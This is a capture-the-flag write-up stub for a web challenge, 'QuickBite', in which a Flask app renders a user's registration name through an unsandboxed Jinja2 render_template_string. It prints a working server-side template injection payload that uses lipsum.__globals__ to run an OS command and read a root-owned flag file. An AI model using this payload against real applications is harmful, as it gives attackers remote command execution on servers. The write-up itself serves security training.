webPromedium
QuickBite — SSTI via Registration Name Field
hackadvisor
Task: Flask food delivery app with user registration; first_name field passed to Jinja2 render_template_string() unsandboxed on profile welcome banner. Solution: Registered user with {{lipsum.__globals__['os'].popen('cat /root/flag.txt').read()}} as first_name, visited /profile to trigger SSTI→RCE.
$ ls tags/ techniques/
ssti_jinja2render_template_string_abusedecoy_flag_recognitionrce_via_lipsum_globals_os_popenuser_registration_injection
🔒
Permission denied (requires tier.pro)
Sign in to access full writeups
Sign in with GitHub to continue. No email required.
$sign in$ grep --similar
Similar writeups
- [web][Pro]Lab 237 — MailCraft — SSTI in Email Template Preview— hackadvisor
- [web][Pro]Состояние 0x7F— hackerlab
- [web][Pro]Dosie X (Dossier X)— hackerlab
- [web][Pro]MailPilot — SSTI in Template Preview— hackadvisor
- [web][Pro]Lab 389 — PulseBoard — SSTI in Custom Widget Template Builder— hackadvisor